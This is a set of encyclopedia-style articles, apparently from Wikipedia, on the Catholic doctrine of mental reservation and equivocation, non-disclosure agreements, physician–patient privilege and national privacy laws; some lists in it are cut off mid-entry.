A frequently cited example of equivocation is a well-known incident from the life of Athanasius of Alexandria. When Julian the Apostate was seeking Athanasius's death, Athanasius fled Alexandria and was pursued up the Nile. Seeing that the imperial officers were gaining on him, Athanasius took advantage of a bend in the river that hid his boat from its pursuers and ordered his boat turned around. When the two boats crossed paths, the Roman officers shouted out, asking if anyone had seen Athanasius. As instructed by Athanasius, his followers shouted back, "Yes, he is not very far off." The pursuing boat hastily continued up the river, while Athanasius returned to Alexandria, where he remained in hiding until the end of the persecution.[5]

Another anecdote often used to illustrate equivocation concerns Francis of Assisi. He once saw a man fleeing from a murderer. When the murderer then came upon Francis, he demanded to know if his quarry had passed that way.
Francis answered, "He did not pass this way", sliding his forefinger into the sleeve of his cassock, thus misleading the murderer and saving a life.[6] A variant of this anecdote is cited by the canonist Martin de Azpilcueta to illustrate his doctrine of a mixed speech (oratoria mixta) combining speech and gestural communication.[7]

When there was good reason for using equivocation, its lawfulness was admitted by all moral theologians. Traditionally, the doctrine of mental reservation was intimately linked with the concept of equivocation, which allowed the speaker to employ double meanings of words to tell the literal truth while concealing a deeper meaning.

The traditional teaching of moral theologians is that a lie is intrinsically evil and therefore never allowed. However, there are instances where one is also under an obligation to keep secrets faithfully, and sometimes the easiest way of fulfilling that duty is to say what is false, or to tell a lie. Writers of all creeds and of none, both ancient and modern, have frankly accepted this position. They admit the doctrine of the "lie of necessity" and maintain that when there is a conflict between justice and veracity, it is justice that should prevail. The common Catholic teaching has formulated the theory of mental reservation as a means by which the claims of both justice and veracity can be satisfied.[8]

If there is no good reason to the contrary, truth requires all to speak frankly and openly, in such a way as to be understood by those who are addressed. A sin is committed if mental reservations are used without just cause, or in cases when the questioner has a right to the naked truth.[8]

In "wide mental reservation" the qualification comes from the ambiguity of the words themselves, or from the circumstances of time, place, or person in which they are uttered.

The Spanish Dominican Raymond of Peñafort was a noted canon lawyer and one of the first writers on casuistry, i.e., seeking to resolve moral problems by extracting or extending theoretical rules from a particular case and applying them to new instances. He noted that Augustine of Hippo said that a man must not slay his own soul by lying in order to preserve the life of another, and that it would be a most perilous doctrine to admit that we may do a lesser evil to prevent another doing a greater. He said that while most doctors teach this, he acknowledged that others allow that a lie should be told when a man's life is at stake. Raymond gave as an example the case of one asked by murderers, bent on taking the life of someone hiding in the house, whether he is in. Raymond did not believe that Augustine would have objected to any of these answers.[8] Those who hear them may understand them in a sense which is not true, but their self-deception may be permitted by the speaker for a good reason.

According to Malloch and Huntley (1966), this doctrine of permissible "equivocation" did not originate with the Jesuits. They cite a short treatise, in cap. Humanae aures, that had been written by Martin Azpilcueta (also known as Doctor Navarrus), an Augustinian who was serving as a consultant to the Apostolic Penitentiary.[9] It was published in Rome in 1584. The first Jesuit influence upon this doctrine did not come until 1609, "when Suarez rejected Azpilcueta's basic proof and supplied another" (speaking of Francisco Suárez).

The 16th-century Spanish theologian Martin de Azpilcueta (often called "Navarrus" because he was born in the Kingdom of Navarre) wrote at length about the doctrine of mentalis restrictio, or mental reservation.
Navarrus held that mental reservation involved truths "expressed partly in speech and partly in the mind," relying upon the idea that God hears what is in one's mind while human beings hear only what one speaks. Therefore, the Christian's moral duty was to tell the truth to God; reserving some of that truth from the ears of human hearers was moral if it served a greater good. This is the doctrine of "strict mental reservation", by which the speaker mentally adds some qualification to the words uttered, and the words together with the mental qualification make a true assertion in accordance with fact.[8]

Navarrus gave the doctrine of mental reservation a far broader and more liberal interpretation than had anyone up to that time. Although some other Catholic theological thinkers and writers took up the argument in favor of strict mental reservation, the canonist Paul Laymann opposed it; the concept remained controversial within the Roman Catholic Church, which never officially endorsed or upheld the doctrine, and Pope Innocent XI eventually condemned it, as formulated by Sanchez, in 1679. After this condemnation by the Holy See, no Catholic theologian has defended the lawfulness of strict mental reservations.

The linked theories of mental reservation and equivocation became notorious in England during the Elizabethan and Jacobean eras, when Jesuits who had entered England to minister to the spiritual needs of Catholics were captured by the authorities. The Jesuits Robert Southwell (c. 1561–1595), who was also a poet of note, and Henry Garnet (1555–1606) both wrote treatises on the topic, which was of far more than academic interest to them. Both risked their lives bringing the sacraments to recusant Catholics — and not only their lives, since sheltering a priest was a capital offence.[10] In 1586, Margaret Clitherow had been pressed to death for refusing to enter a plea on the charge of harbouring two priests at York.[11] When caught, tortured and interrogated, Southwell and Garnet practiced mental reservation not to save themselves — their deaths were a foregone conclusion — but to protect their fellow believers.[10]

Southwell, who was arrested in 1592, was accused at his trial of having told a witness that even if she were forced by the authorities to swear under oath, it was permissible to lie to conceal the whereabouts of a priest. Southwell replied that that was not what he had said. He had said that "to an oath were required justice, judgement and truth", but the rest of his answer went unrecorded because one of the judges angrily shouted him down.[12] Convicted in 1595, Southwell was hanged, drawn and quartered. More famous in his own era was Henry Garnet, who wrote a defense of Southwell in 1598; Garnet was captured by the authorities in 1606 over his alleged involvement in the Gunpowder Plot. Facing the same accusations as Southwell, his attempts to defend himself met with no better result: later that year, Garnet was executed in the same fashion.

The Protestants considered these doctrines mere justifications for lies.
Catholic ethicists also voiced objections: the Jansenist "Blaise Pascal...attacked the Jesuits in the seventeenth century for what he saw as their moral laxity."[13] "By 1679, the doctrine of strict mental reservation put forward by Navarrus had become such a scandal that Pope Innocent XI officially condemned it."[14] Other casuists justifying mental reservation included Thomas Sanchez, who was criticized by Pascal in his Provincial Letters – although Sanchez added various restrictions (it should not be used in ordinary circumstances, when one is interrogated by competent magistrates, when a creed is requested, even for heretics, etc.), which Pascal ignored.

This type of equivocation was famously mocked in the porter's speech in Shakespeare's Macbeth, in which the porter directly alludes to the practice of deceiving under oath by means of equivocation: "Faith, here's an equivocator, that could swear in both the scales against either scale; who committed treason enough for God's sake, yet could not equivocate to heaven." (Macbeth, Act 2, Scene 3) See, for example, Robert Southwell and Henry Garnet, author of A Treatise of Equivocation (published secretly c. 1595) — to whom, it is supposed, Shakespeare was specifically referring.[citation needed] Shakespeare made the reference to priests because the religious use of equivocation was well known in those periods of early modern England (e.g. under James VI/I) when it was a capital offence for a Roman Catholic priest to enter England. A Jesuit priest would equivocate in order to protect himself from the secular authorities without (in his eyes) committing the sin of lying.

Following Innocent XI's condemnation of strict mental reservation, equivocation (or wide mental reservation) was still considered orthodox, and it was revived and defended by Alphonsus Liguori. The Jesuit Gabriel Daniel wrote in 1694 Entretiens de Cleanthe et d'Eudoxe sur les lettres provinciales, a reply to Pascal's Provincial Letters in which he accused Pascal of lying, or even of having himself used mental reservation, by not mentioning all the restrictions imposed by Sanchez on the use of this form of deception.

In his licentiate thesis, Edouard Guilloux says that the study of language shows "that there can be a gap between what a speaker means when he utters a given sentence and the literal meaning of that same sentence", yet "the literal meaning of a sentence must be apt to convey what the speaker means: the speaker cannot authentically be said to have meant to say something that has no relation to the literal meaning of the sentence he utters." "Since the non-literal meaning intended by the speaker can be detected in the circumstances of his utterance, he can authentically be said to have meant to say it, and if that meaning yields a true statement, then he has said nothing false."[15] According to Alphonsus Liguori, for the licit use of a mental reservation "an absolutely serious cause is not required; any reasonable cause is enough, for instance to free oneself from the inconvenient and unjust interrogation of another." Alphonsus said, "we do not deceive our neighbor, but for a just cause we allow that he deceive himself."[16]

The New Catholic Encyclopedia says, "A man can affirm that he had coffee and toast for breakfast without denying that he had an egg, or he might affirm that he has a lesser amount of money in his pocket without denying that he also has a greater amount.
So long as he has reasonable cause to conceal part of the truth, he does no wrong, provided, of course, that he is careful not to indicate that he has 'only' so much to eat or that he has 'only' so much money." Also, if "a wife, who has been unfaithful but after her lapse has received the Sacrament of Penance, is asked by her husband if she has committed adultery, she could truthfully reply: 'I am free from sin.'"[17]

This type of untruth was condemned by Kant in On a Supposed Right to Lie. Kant was arguing against Benjamin Constant, who had claimed, from a consequentialist stance opposed to Kant's categorical imperative, that "To tell the truth is thus a duty; but it is only in respect to one who has a right to the truth. But no one has a right to a truth which injures others."[18]

Kant, on the other hand, asserted in the Groundwork of the Metaphysic of Morals that lying, or deception of any kind, is forbidden under any interpretation and in any circumstance. In the Groundwork, Kant gives the example of a person who seeks to borrow money without intending to pay it back. The maxim of this action, says Kant, results in a contradiction in conceivability (and thus contradicts perfect duty) because it would logically contradict the reliability of language: if it were universally acceptable to lie, then no one would believe anyone and all truths would be assumed to be lies (this last point was accepted by the casuists, hence the restrictions they placed on the cases in which deception was authorized).[19] A right to deceive could also not be claimed, because it would deny the status of the person deceived as an end in himself; and the theft would be incompatible with a possible kingdom of ends. Therefore, Kant denied any right to lie or deceive, regardless of context or anticipated consequences. It was, however, permissible to remain silent or to say no more than needed (as in the infamous example of a murderer asking to know where someone is).

The doctrines have also been criticized by Sissela Bok[20] and by Paul Ekman, who defines lies by omission as the main form of lying – though the larger and more complex moral and ethical issues of lying and truth-telling extend far beyond these specific doctrines. Ekman, however, does not consider cases of deception where "it is improper to question" the truth to be real deceptions[21] – this sort of case, where communication of the truth is not expected and deception is therefore justified, was included by the casuists.[19]

The Irish Catholic Church allegedly misused the concept of mental reservation when dealing with situations relating to clerical child sexual abuse, by disregarding the restrictions placed on its employment by moral theologians and treating it as a method that "allows clerics (to) mislead people...without being guilty of lying",[22] for example when dealing with the police, victims, civil authorities and media. In the Murphy Report into the sexual abuse scandal in the Catholic archdiocese of Dublin, Cardinal Desmond Connell describes it thus:

Well, the general teaching about mental reservation is that you are not permitted to tell a lie. On the other hand, you may be put in a position where you have to answer, and there may be circumstances in which you can use an ambiguous expression realising that the person who you are talking to will accept an untrue version of whatever it may be – permitting that to happen, not willing that it happened, that would be lying.
It really is a matter of trying to deal with extraordinarily difficult matters that may arise in social relations where people may ask questions that you simply cannot answer. Everybody knows that this kind of thing is liable to happen. So mental reservation is, in a sense, a way of answering without lying.

Cathleen Kaveny, writing in the Catholic magazine Commonweal, notes that Henry Garnet, in his treatise on the topic, took pains to argue that no form of mental reservation was justified — and might even be a mortal sin — if it ran contrary to the requirements of faith, charity or justice.[10] But according to the Murphy Report:

The Dublin Archdiocese's preoccupations in dealing with cases of child sexual abuse, at least until the mid 1990s, were the maintenance of secrecy, the avoidance of scandal, the protection of the reputation of the church, and the preservation of its assets. All other considerations, including the welfare of children and justice for victims, were subordinated to these priorities. The archdiocese did not implement its own canon-law rules and did its best to avoid any application of the law of the state.

Kaveny concludes: "The truths of faith are illuminated by the lives of the martyrs. Southwell and Garnet practiced mental reservation to save innocent victims while sacrificing themselves. The Irish prelates practiced mental reservation to save themselves while sacrificing innocent victims. And that difference makes all the difference."[10]

In the Australian case of Deacon v Transport Regulation Board (Supreme Court of Victoria, 1956), Deacon argued that payments for interstate transport licensing had been made under duress and should be reimbursed. The court held that on the facts of the case payment had been made voluntarily, and without protest, and observed that:

No secret mental reservation of the doer is material. The question is - what would his conduct indicate to a reasonable man as his mental state?[23]

The case and the same wording were referenced in the 1979 English case of North Ocean Shipping Co. Ltd. v Hyundai Construction Co., Ltd.[24]
https://en.wikipedia.org/wiki/Doctrine_of_mental_reservation
A non-disclosure agreement (NDA), also known as a confidentiality agreement (CA), confidential disclosure agreement (CDA), proprietary information agreement (PIA), or secrecy agreement (SA), is a legal contract, or part of a contract, between at least two parties that outlines confidential material, knowledge, or information that the parties wish to share with one another for certain purposes but wish to restrict access to. Doctor–patient confidentiality (physician–patient privilege), attorney–client privilege, priest–penitent privilege and bank–client confidentiality agreements are examples of NDAs, which are often not enshrined in a written contract between the parties.

It is a contract through which the parties agree not to disclose any information covered by the agreement. An NDA creates a confidential relationship between the parties, typically to protect any type of confidential and proprietary information or trade secrets. As such, an NDA protects non-public business information. Like all contracts, they cannot be enforced if the contracted activities are illegal. NDAs are commonly signed when two companies, individuals, or other entities (such as partnerships, societies, etc.) are considering doing business and need to understand the processes used in each other's business for the purpose of evaluating the potential business relationship. NDAs can be "mutual", meaning both parties are restricted in their use of the materials provided, or they can restrict the use of materials by a single party. An employee can be required to sign an NDA or NDA-like agreement with an employer, protecting trade secrets; indeed, some employment agreements include a clause restricting employees' use and dissemination of company-owned confidential information. In legal disputes resolved by settlement, the parties often sign a confidentiality agreement relating to the terms of the settlement.[1][2] Examples of such agreements are the Dolby Trademark Agreement with Dolby Laboratories, the Windows Insider Agreement, and the Halo CFP (Community Feedback Program) with Microsoft.

In some cases, employees who are dismissed following complaints about unacceptable practices (whistleblowers), or about discrimination against and harassment of themselves, may be paid compensation subject to an NDA forbidding them from disclosing the events complained about. Such conditions in an NDA may not be enforceable by law, although they may intimidate the former employee into silence.[3] A similar concept is expressed in the term "non-disparagement agreement", which prevents one party from stating anything 'derogatory' about the other party.[4]

A non-disclosure agreement (NDA) may be classified as unilateral, bilateral, or multilateral:

A unilateral NDA (sometimes referred to as a one-way NDA) involves two parties where only one party (i.e., the disclosing party) anticipates disclosing certain information to the other party (i.e., the receiving party) and requires that the information be protected from further disclosure for some reason (e.g., maintaining the secrecy necessary to satisfy patent laws,[5] preserving legal protection for trade secrets, limiting disclosure of information prior to issuing a press release for a major announcement, or simply ensuring that a receiving party does not use or disclose information without compensating the disclosing party).
A bilateral NDA (sometimes referred to as a mutual NDA, MNDA, or two-way NDA) involves two parties where both anticipate disclosing information to one another that each intends to protect from further disclosure. This type of NDA is common for businesses considering some kind of joint venture or merger. When presented with a unilateral NDA, some parties may insist upon a bilateral NDA, even though they anticipate that only one of the parties will disclose information under it. This approach is intended to incentivize the drafter to make the provisions of the NDA more "fair and balanced" by introducing the possibility that a receiving party could later become a disclosing party, or vice versa — not an entirely uncommon occurrence.

A multilateral NDA involves three or more parties where at least one of the parties anticipates disclosing information to the other parties and requires that the information be protected from further disclosure. This type of NDA eliminates the need for separate unilateral or bilateral NDAs between only two parties: for example, a single multiparty NDA entered into by three parties who each intend to disclose information to the other two could be used in place of three separate bilateral NDAs between the first and second parties, the second and third parties, and the third and first parties. A multilateral NDA can be advantageous because the parties involved review, execute, and implement just one agreement. This advantage can be offset by the more complex negotiations that may be required for the parties to reach unanimous consensus on a multilateral agreement.

An NDA can protect any type of information that is not generally known. It may also contain clauses that protect the person receiving the information, so that if they lawfully obtained the information through other sources they would not be obligated to keep it secret.[6] In other words, the NDA typically only requires the receiving party to maintain information in confidence when that information has been directly supplied by the disclosing party. Some common issues addressed in an NDA include:[7]

Deeds of confidentiality and fidelity (also referred to as deeds of confidentiality or confidentiality deeds) are commonly used in Australia. These documents generally serve the same purpose as, and contain provisions similar to, NDAs used elsewhere.

NDAs are used in India.[8] They have been described as "an increasingly popular way of restricting the loss of R&D knowledge through employee turnover in Indian IT firms".[8] They are often used by companies from other countries that are outsourcing or offshoring work to companies in India.[9][10] Companies outsourcing research and development of biopharma to India use them, and Indian pharmaceutical companies are "competent" in their use.[11][12] In the space industry, NDAs "are crucial".[13] "Non-disclosure and confidentiality agreements ... are ... generally enforceable as long as they are reasonable."[14] Sometimes NDAs have been anti-competitive, and this has led to legal challenges.[15]

In the United Kingdom, the term "back-to-back agreement" refers to an NDA entered into with a third party who legitimately receives confidential information, putting them under non-disclosure obligations similar to those of the party initially granted the information. Case law in a 2013 Court of Appeal decision (Dorchester Project Management v BNP Paribas) confirmed that a confidentiality agreement will be interpreted as a contract subject to the rules of contractual interpretation which generally apply in English courts.[16]

NDAs are often used as a condition of a financial settlement in an attempt to silence whistleblowing employees from making public the misdeeds of their former employers. There is a law, the Public Interest Disclosure Act 1998, which allows "protected disclosure" despite the existence of an NDA, although employers sometimes intimidate the former employee into silence despite this.[3][17]

In some legal cases where the conditions of a confidentiality agreement have been breached, the successful party may choose between damages based on an account of the commercial profits which might have been earned if the agreement had been honoured, or damages based on the price of releasing the other party from its obligations under the agreement.[18]

Commercial entities entering into confidentiality agreements need to ensure that the scope of their agreement does not go beyond what is necessary to protect commercial information. In the case of Jones v Ricoh, heard by the High Court in 2010, Jones brought an action against the photocopier manufacturer Ricoh for breach of their confidentiality agreement when Ricoh submitted a tender for a contract with a third party. Ricoh sought release from its obligations under the agreement via an application for summary judgment, and the court agreed that the relevant wording "went further than could reasonably be required" to protect commercial information. The agreement was held to be in breach of Article 101 of the Treaty on the Functioning of the European Union, which prohibits agreements that have the object or effect of distorting competition, and was therefore unenforceable.[19]

As of 2025, NDAs have long been misused in the UK to prevent people, usually employees, from reporting sexual and other abuse they have suffered. Parliament has consulted regarding proposed legislation to curb such use, with a debate on the use of NDAs by employers to cover up workplace abuse and discrimination.[20][3]

In Ireland, confidentiality agreements or non-disclosure agreements are affected by the Maternity Protection, Employment Equality and Preservation of Certain Records Act 2024.[21] The Act amends the Employment Equality Act 1998 by restricting the use of non-disclosure agreements (NDAs).[22] The 2024 Act renders void any NDA that prohibits an employee from disclosing:

NDAs are very common in the United States, with more than one-third of American jobs covered by one.
The United States Congress passed the Speak Out Act in 2022, which prohibits such agreements in regard to sexual harassment and sexual assault; the bill was signed into law by President Joe Biden on December 7, 2022.[23] Some states, including California, recognise special circumstances relating to NDAs and non-compete clauses. California's courts and legislature have signalled that they generally value an employee's mobility and entrepreneurship more highly than they do protectionist doctrine.[24][25]
https://en.wikipedia.org/wiki/Non-disclosure_agreement
Physician–patient privilege is a legal concept, related to medical confidentiality, that protects communications between a patient and their doctor from being used against the patient in court. It is a part of the rules of evidence in many common law jurisdictions. Almost every jurisdiction that recognizes the physician–patient privilege not to testify in court, whether by statute or through case law, limits the privilege to knowledge acquired during the course of providing medical services. In some jurisdictions, conversations between a patient and physician may be privileged in both criminal and civil courts.

The privilege may cover the situation where a patient confesses to a psychiatrist that they committed a particular crime. It may also cover normal inquiries regarding matters such as injuries that may result in civil action. For example, any defendant the patient may be suing at the time cannot ask the doctor whether the patient ever expressed the belief that their condition had improved. However, the rule generally does not apply to confidences shared with physicians when they are not serving in the role of medical providers.

The reasoning behind the rule is that a level of trust must exist in the doctor–patient relationship so that the physician can properly treat the patient. If the patient were fearful of telling the truth to the physician because they believed the physician would report such behavior to the authorities, the treatment process could be rendered far more difficult, or the physician could make an incorrect diagnosis. For example, suppose a patient below the age of consent comes to a doctor with a sexually transmitted disease. The doctor is usually required to obtain a list of the patient's sexual contacts in order to inform them that they need treatment — an important health concern. However, the patient may be reluctant to divulge the names of their older sexual partners, for fear that those partners will be charged with statutory rape. In some jurisdictions, the doctor cannot be forced to reveal the information disclosed by the patient to anyone except particular organizations specified by law, and those organizations too are required to keep the information confidential. If the police become aware of such information, they are not allowed to use it in court as proof of the sexual misconduct, except as provided by the express intent of the legislative body and formalized into law.[1]

The law in Ontario, Canada, requires that physicians report patients who, in the opinion of the physician, may be unfit to drive for medical reasons, as per Section 203 of the Highway Traffic Act.[2]

The law in New Hampshire places physician–patient communications on the same basis as attorney–client communications, except in cases where law enforcement officers seek blood or urine test samples and test results taken from a patient who is being investigated for driving while intoxicated.[3]

In the United States, the Federal Rules of Evidence do not recognize doctor–patient privilege. At the state level, the extent of the privilege varies depending on the law of the applicable jurisdiction. For example, in Texas there is only a limited physician–patient privilege in criminal proceedings, and the privilege is limited in civil cases as well.[4]

In New South Wales, Australia, a privilege exists for "communication made by a person in confidence to another person .... in the course of a relationship in which the confidant was acting in a professional capacity".[5] This is often interpreted as being between a health professional and their patient. In some jurisdictions in Australia, privilege may also extend to lawyers,[6] some victims,[7] journalists (shield laws),[8] and priests.[9] It may also be invoked in the public interest,[10] or in settlement negotiations,[11] which may also be privileged.[12]
https://en.wikipedia.org/wiki/Physician%E2%80%93patient_privilege
Privacy law is the body of regulation that governs the collection, storage, and use of personal information by healthcare providers, governments, companies, other public or private entities, or individuals. Privacy laws are examined in relation to an individual's entitlement to privacy or their reasonable expectations of privacy. The Universal Declaration of Human Rights asserts that every person possesses the right to privacy; however, the understanding and application of this right differ among nations and are not consistently uniform.

Throughout history, privacy laws have evolved to address emerging challenges, with significant milestones including the Privacy Act of 1974[1] in the U.S. and the European Union's Data Protection Directive of 1995. Today, international standards like the GDPR set global benchmarks, while sector-specific regulations like HIPAA and COPPA complement state-level laws in the U.S. In Canada, PIPEDA governs privacy, with recent case law shaping privacy rights. The challenges posed by digital platforms underscore the ongoing evolution and compliance complexities of privacy law.

Privacy laws can be broadly classified into:

The categorization of different laws involving individual rights of privacy assesses how different laws protect individuals from having their rights of privacy violated or abused by certain groups or persons. These classifications provide a framework for understanding the legal principles and obligations that govern privacy protection and enforcement efforts, and they help policymakers, legal practitioners, and individuals better understand the complexity of the responsibilities involved in ensuring the protection of privacy rights. A brief overview of the four classifications, showing the ways in which privacy rights are protected and regulated, follows:

Privacy laws focus on protecting individuals' rights to control their personal information and to prevent unauthorized intrusion into their private lives. They encompass strict regulations governing data protection, confidentiality, surveillance, and the use of personal information by both government and corporate entities.[2]

Trespassing laws address breaches of privacy rights involving physical intrusion onto an individual's property or personal domain without consent. This covers illegal activities such as entering an individual's residence without consent, conducting surveillance by physical means (e.g., deploying hidden cameras), or any other unauthorized entry onto the individual's property.[3]

Negligence laws generally address situations where individuals or entities fail to exercise appropriate caution in protecting the privacy rights of others, often holding them accountable through penalties such as heavy fines. This aims to ensure compliance and deter future violations, covering incidents such as the mishandling of sensitive data, poor security measures leading to data breaches, or non-compliance with privacy policies and regulations.[4]

Fiduciary laws regulate relationships characterized by trust and confidence, in which the fiduciary accepts legal responsibility for duties of care, loyalty, good faith, confidentiality, and more when entrusted with serving the best interests of a beneficiary.
In terms of privacy, fiduciary obligations may extend to professionals such as lawyers, doctors, financial advisors, and others responsible for handling confidential information, as a result of their duty of confidentiality to clients or patients.[5]

The Asia-Pacific Economic Cooperation (APEC) introduced a voluntary Privacy Framework in 2004, which all 21 member economies adopted. This framework aims to enhance general information privacy and facilitate the secure transfer of data across borders. It comprises nine Privacy Principles, serving as minimum standards for privacy protection: preventing harm, providing notice, limiting data collection, ensuring personal information is used appropriately, offering choice to individuals, maintaining data integrity, implementing security safeguards, allowing access to and correction of personal information, and enforcing accountability. In 2011, APEC established the APEC Cross Border Privacy Rules System to balance the flow of information and data across borders, which is crucial for fostering trust and confidence in the online marketplace. The system builds upon the APEC Privacy Framework and incorporates four agreed-upon rules involving self-assessment, compliance review, recognition/acceptance, and dispute resolution and enforcement.[7]

Article 8 of the European Convention on Human Rights, established by the Council of Europe in 1950 and applicable across the European continent except for Belarus and Kosovo, safeguards the right to privacy: "Everyone has the right to respect for his private and family life, his home and his correspondence." Through the extensive case law of the European Court of Human Rights in Strasbourg, privacy has been clearly defined and universally recognized as a fundamental right. The Council of Europe also took specific steps to protect individuals' privacy rights: in 1981 it adopted the Convention for the Protection of Individuals with regard to Automatic Processing of Personal Data, and in 1998 it addressed privacy concerns related to the internet by publishing "Draft Guidelines for the protection of individuals with regard to the collection and processing of personal data on the information highway", developed in collaboration with the European Commission. These guidelines were formally adopted in 1999.[8]

The 1995 Data Protection Directive (officially Directive 95/46/EC) acknowledged the authority of national data protection authorities and required all Member States to adhere to standardized privacy protection guidelines, enacting stringent privacy laws consistent with the framework provided by the Directive. Moreover, the Directive specified that non-EU countries must implement privacy legislation of equivalent rigor in order to exchange personal data with EU countries; companies in non-EU countries wishing to conduct business with EU-based companies must likewise adhere to privacy standards at least as strict as those outlined in the Directive. Consequently, the Directive has influenced the development of privacy legislation beyond European borders. The proposed ePrivacy Regulation, intended to replace the Privacy and Electronic Communications Directive 2002, further contributes to EU privacy regulation. On 25 May 2018, the General Data Protection Regulation superseded the Data Protection Directive of 1995.
A significant aspect introduced by the General Data Protection Regulation is the recognition of the "right to be forgotten",[9] which requires any organization that collects data on individuals to delete the relevant data upon the individual's request. The Regulation drew inspiration from the European Convention on Human Rights mentioned earlier.

The OECD (Organisation for Economic Co-operation and Development) initiated privacy guidelines in 1980, setting international standards, and in 2007 proposed cross-border cooperation in privacy law enforcement. Article 17 of the UN's International Covenant on Civil and Political Rights protects privacy, a protection echoed in the 2013 UN General Assembly resolution affirming privacy as a fundamental human right in the digital age. The Principles on Personal Data Protection and Privacy for the UN System were declared in 2018.[10]

Article 17 of the International Covenant on Civil and Political Rights of the United Nations (1966) also protects privacy: "No one shall be subjected to arbitrary or unlawful interference with his privacy, family, home or correspondence, nor to unlawful attacks on his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks." On 18 December 2013, the United Nations General Assembly adopted resolution 68/167 on the right to privacy in the digital age. The resolution references the Universal Declaration of Human Rights and reaffirms the fundamental and protected human right of privacy.[11] The Principles on Personal Data Protection and Privacy for the United Nations System were declared on 11 October 2018.[12]

The current state of privacy law in Australia includes federal and state information privacy legislation, some sector-specific privacy legislation at state level, regulation of the media, and some criminal sanctions. The position concerning civil causes of action for invasion of privacy is unclear: some courts have indicated that a tort of invasion of privacy may exist in Australia.[13][14][15][16] However, this has not been upheld by the higher courts, which have been content to develop the equitable doctrine of breach of confidence to protect privacy, following the example set by the UK.[15] In 2008, the Australian Law Reform Commission recommended the enactment of a statutory cause of action for invasion of privacy.[17] The Privacy Act 1988 aims to protect and regulate an individual's private information;[18] it manages and monitors how the Australian Government and organisations hold personal information.[18]

The Bahamas has an official data protection law protecting the personal information of its citizens in both the private and public sectors: the Data Protection Act 2003 (the Bahamas Law).[19] The Bahamas Law appoints a data protection commissioner to the Office of Data Protection to ensure that data protection is upheld. Even though legislation is in force in the Bahamas through the Data Protection Act 2003, the act lacks many enforcement mechanisms: no data protection officer needs to be in office, and no group or organization is required to notify the Office of Data Protection when a hacker has breached privacy law. There are also no requirements for registering databases or restricting data flows across national borders. The legislation therefore does not meet European Union standards, which had been the goal of creating the law in the first place.[20] The Bahamas is also a member of CARICOM, the Caribbean Community.
Belize is currently among the minority of countries that do not have any official data privacy laws.[21] However, the Freedom of Information Act (2000) protects the personal information of the citizens of Belize, though there is no current documentation clarifying whether the act covers electronic data.[19] As a consequence of the lack of official data privacy laws, there was a breach of personal data in 2009, when an employee's laptop was stolen from Belize's Vital Statistics Unit; it contained birth certificate information for all citizens residing in Belize. Although the robbery did not intentionally target the laptop — the robber did not foresee the severity of the theft — Belize was put in a vulnerable position that could have been avoided had regulations been in place.

A Brazilian citizen's privacy is protected by the country's constitution, which states: "The intimacy, private life, honor and image of the people are inviolable, with assured right to indenization by material or moral damage resulting from its violation."[22] On 14 August 2018, Brazil enacted its General Personal Data Protection Law.[23] The law has 65 articles and many similarities to the GDPR. The first English translation of the new data protection law was published by Ronaldo Lemos, a Brazilian lawyer specializing in technology, on that same date.[24] A newer version has since been published.[25]

In Canada, the federal Personal Information Protection and Electronic Documents Act (PIPEDA) governs the collection, use, and disclosure of personal information in connection with commercial activities, as well as personal information about employees of federal works, undertakings and businesses. PIPEDA brings Canada into compliance with EU data protection law,[26] although civil society, regulators, and academics have more recently argued that it does not sufficiently address the modern challenges of privacy law, particularly in view of AI, and have called for reform.[27] PIPEDA does not apply to non-commercial organizations or provincial governments, which remain within the jurisdiction of the provinces. Five Canadian provinces have enacted privacy laws that apply to their private sectors. Personal information collected, used and disclosed by the federal government and crown corporations is governed by the Privacy Act. Many provinces have enacted provincial legislation similar to the Privacy Act, such as Ontario's Freedom of Information and Protection of Privacy Act, which applies to public bodies in that province.

There remains some debate whether a common law tort for breach of privacy exists across Canada. A number of cases have identified a common law right to privacy, but the requirements have not always been articulated clearly.[28] In Eastmond v. Canadian Pacific Railway & Privacy Commissioner of Canada,[29] Canada's Supreme Court found that CP could collect Eastmond's personal information without his knowledge or consent because it benefited from the exemption in paragraph 7(1)(b) of PIPEDA, which provides that personal information can be collected without consent if "it is reasonable to expect that the collection with the knowledge or consent of the individual would compromise the availability or the accuracy of the information and the collection is reasonable for purposes related to investigating a breach of an agreement".[29]

Canadian privacy laws have significant implications for various sectors, particularly finance, healthcare, and digital commerce.
For instance, the financial sector is strictly regulated under PIPEDA, which requires financial institutions to obtain consent for the collection, use, or disclosure of personal information. These institutions must also provide robust safeguards to protect such information against loss or theft. In healthcare, provinces like Alberta and British Columbia have specific laws protecting personal health information, which require healthcare providers to manage patient data with a high level of confidentiality and security, including ensuring that patient consent is obtained before personal health information is shared or accessed.

Recent case law in Canada has further defined the scope and application of privacy laws. For instance, Jones v. Tsige recognized the tort of intrusion upon seclusion, affirming that individuals have a right to privacy against unreasonable intrusion. This landmark ruling has significant implications for how personal data is handled across all sectors, emphasizing the need for businesses to maintain strict privacy controls.[30]

Canadian privacy laws also interact with international frameworks, notably the European Union's General Data Protection Regulation (GDPR). Although PIPEDA shares many similarities with the GDPR, there are nuanced differences, particularly in terms of consent and data subject rights. Canadian businesses dealing with international data need to comply with both PIPEDA and the GDPR, making compliance a complex but critical task.[31]

The digital transformation has brought specific challenges and focus areas for privacy regulation in Canada. The Canadian Anti-Spam Legislation (CASL), for example, regulates how businesses may conduct digital marketing and communications, requiring explicit consent for sending commercial electronic messages. This legislation is part of Canada's efforts to protect consumers from spam and related threats while ensuring that businesses conduct their digital marketing responsibly.[32]

The rise of digital platforms has also prompted discussions about privacy rights concerning consumer data collected by large tech companies. The Privacy Commissioner of Canada has been active in investigating and regulating how these companies comply with Canadian privacy laws, ensuring that they provide transparency to users about data usage and uphold the rights of Canadian citizens.

Canadian privacy laws are continually evolving to address new challenges posed by technological advancements and global data flows. Businesses operating in Canada must stay informed about these changes to ensure compliance and to protect the personal information of their customers effectively. For detailed guidance and the latest updates on compliance with Canadian privacy laws, businesses and individuals can refer to resources provided by the Office of the Privacy Commissioner of Canada and to expert analyses of developments in Canadian privacy law.[33]

In 1995, the Computer-Processed Personal Information Protection Act was enacted in order to protect personal information processed by computers.
Its general provisions specified the purpose of the law, defined crucial terms, and prohibited individuals from waiving certain rights.[34]

The National Security Law and the Cybersecurity Law promulgated in 2015 give public security and state security departments broad powers to collect all kinds of information, compel individuals using network services to submit private information for monitoring, and compel network operators to store user data within China; unrestricted "technical support" must also be provided to the security organs. Other laws and regulations related to privacy are as follows:

Article 38. The personal dignity of citizens of the People's Republic of China shall not be violated. It is forbidden to use any method to insult, slander, or falsely accuse citizens.

